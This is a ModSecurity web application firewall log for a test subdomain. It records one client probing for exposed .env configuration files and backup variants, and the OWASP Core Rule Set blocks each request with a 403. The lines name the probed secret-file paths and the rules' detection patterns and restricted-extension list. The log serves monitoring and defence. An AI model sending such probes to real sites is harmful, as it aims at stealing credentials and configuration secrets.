[Fri Jan 16 03:14:04.438878 2026] [:error] [pid 1444034] [client 45.148.10.246:36494] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.preprod/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.preprod/"] [unique_id "aWme7ORfEYyDES-ZFL4ghQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.preprod/
[Fri Jan 16 03:14:04.439108 2026] [:error] [pid 1444034] [client 45.148.10.246:36494] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.preprod/"] [unique_id "aWme7ORfEYyDES-ZFL4ghQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.preprod/
[Fri Jan 16 03:14:04.439273 2026] [:error] [pid 1444034] [client 45.148.10.246:36494] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.preprod/"] [unique_id "aWme7ORfEYyDES-ZFL4ghQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.preprod/
[Fri Jan 16 03:14:04.597644 2026] [:error] [pid 1444032] [client 45.148.10.246:36500] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.preprod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.preprod"] [unique_id "aWme7OkMvq8uPO2ZciWohAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//.env.preprod
[Fri Jan 16 03:14:04.597872 2026] [:error] [pid 1444032] [client 45.148.10.246:36500] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.preprod"] [unique_id "aWme7OkMvq8uPO2ZciWohAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//.env.preprod
[Fri Jan 16 03:14:04.598068 2026] [:error] [pid 1444032] [client 45.148.10.246:36500] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.preprod"] [unique_id "aWme7OkMvq8uPO2ZciWohAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//.env.preprod
[Fri Jan 16 03:14:04.763919 2026] [:error] [pid 1444226] [client 45.148.10.246:36502] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.preprod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.preprod"] [unique_id "aWme7GcpoCUgeFICb0bc1QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./.env.preprod
[Fri Jan 16 03:14:04.764164 2026] [:error] [pid 1444226] [client 45.148.10.246:36502] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.preprod"] [unique_id "aWme7GcpoCUgeFICb0bc1QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./.env.preprod
[Fri Jan 16 03:14:04.764345 2026] [:error] [pid 1444226] [client 45.148.10.246:36502] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.preprod"] [unique_id "aWme7GcpoCUgeFICb0bc1QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./.env.preprod
[Fri Jan 16 03:14:04.974792 2026] [:error] [pid 1444040] [client 45.148.10.246:36508] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWme7Pn_5sIyKhJ5GAzXrAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.backup
[Fri Jan 16 03:14:04.974939 2026] [:error] [pid 1444040] [client 45.148.10.246:36508] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWme7Pn_5sIyKhJ5GAzXrAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.backup
[Fri Jan 16 03:14:04.975155 2026] [:error] [pid 1444040] [client 45.148.10.246:36508] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWme7Pn_5sIyKhJ5GAzXrAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.backup
[Fri Jan 16 03:14:04.975322 2026] [:error] [pid 1444040] [client 45.148.10.246:36508] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWme7Pn_5sIyKhJ5GAzXrAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.backup
[Fri Jan 16 03:14:05.152075 2026] [:error] [pid 1444031] [client 45.148.10.246:36514] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup/"] [unique_id "aWme7X-9MmrgwjmYTAJQaQAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.backup/
[Fri Jan 16 03:14:05.152305 2026] [:error] [pid 1444031] [client 45.148.10.246:36514] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup/"] [unique_id "aWme7X-9MmrgwjmYTAJQaQAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.backup/
[Fri Jan 16 03:14:05.152465 2026] [:error] [pid 1444031] [client 45.148.10.246:36514] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup/"] [unique_id "aWme7X-9MmrgwjmYTAJQaQAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.backup/
[Fri Jan 16 03:14:05.312431 2026] [:error] [pid 1444033] [client 45.148.10.246:36516] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWme7dLJkp65ULFQ2YYgkgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.backup
[Fri Jan 16 03:14:05.312567 2026] [:error] [pid 1444033] [client 45.148.10.246:36516] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWme7dLJkp65ULFQ2YYgkgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.backup
[Fri Jan 16 03:14:05.312782 2026] [:error] [pid 1444033] [client 45.148.10.246:36516] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWme7dLJkp65ULFQ2YYgkgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.backup
[Fri Jan 16 03:14:05.312929 2026] [:error] [pid 1444033] [client 45.148.10.246:36516] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWme7dLJkp65ULFQ2YYgkgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.backup
[Fri Jan 16 03:14:05.477003 2026] [:error] [pid 1444034] [client 45.148.10.246:36520] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWme7eRfEYyDES-ZFL4ghgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.backup
[Fri Jan 16 03:14:05.477154 2026] [:error] [pid 1444034] [client 45.148.10.246:36520] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWme7eRfEYyDES-ZFL4ghgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.backup
[Fri Jan 16 03:14:05.477377 2026] [:error] [pid 1444034] [client 45.148.10.246:36520] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWme7eRfEYyDES-ZFL4ghgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.backup
[Fri Jan 16 03:14:05.477533 2026] [:error] [pid 1444034] [client 45.148.10.246:36520] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWme7eRfEYyDES-ZFL4ghgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.backup
[Fri Jan 16 03:14:05.652404 2026] [:error] [pid 1444032] [client 45.148.10.246:36522] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.back"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.back"] [unique_id "aWme7ekMvq8uPO2ZciWohQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.back
[Fri Jan 16 03:14:05.652635 2026] [:error] [pid 1444032] [client 45.148.10.246:36522] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.back"] [unique_id "aWme7ekMvq8uPO2ZciWohQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.back
[Fri Jan 16 03:14:05.652878 2026] [:error] [pid 1444032] [client 45.148.10.246:36522] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.back"] [unique_id "aWme7ekMvq8uPO2ZciWohQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.back
[Fri Jan 16 03:14:05.952172 2026] [:error] [pid 1444226] [client 45.148.10.246:36538] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.back"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.back"] [unique_id "aWme7WcpoCUgeFICb0bc1gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.back
[Fri Jan 16 03:14:05.952389 2026] [:error] [pid 1444226] [client 45.148.10.246:36538] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.back"] [unique_id "aWme7WcpoCUgeFICb0bc1gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.back
[Fri Jan 16 03:14:05.952553 2026] [:error] [pid 1444226] [client 45.148.10.246:36538] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.back"] [unique_id "aWme7WcpoCUgeFICb0bc1gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.back
[Fri Jan 16 03:14:06.058713 2026] [:error] [pid 1444040] [client 45.148.10.246:36544] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.back"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.back"] [unique_id "aWme7vn_5sIyKhJ5GAzXrQAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.back
[Fri Jan 16 03:14:06.058950 2026] [:error] [pid 1444040] [client 45.148.10.246:36544] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.back"] [unique_id "aWme7vn_5sIyKhJ5GAzXrQAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.back
[Fri Jan 16 03:14:06.059120 2026] [:error] [pid 1444040] [client 45.148.10.246:36544] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.back"] [unique_id "aWme7vn_5sIyKhJ5GAzXrQAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.back
[Fri Jan 16 03:14:06.200546 2026] [:error] [pid 1444031] [client 45.148.10.246:36556] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWme7n-9MmrgwjmYTAJQagAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.bak
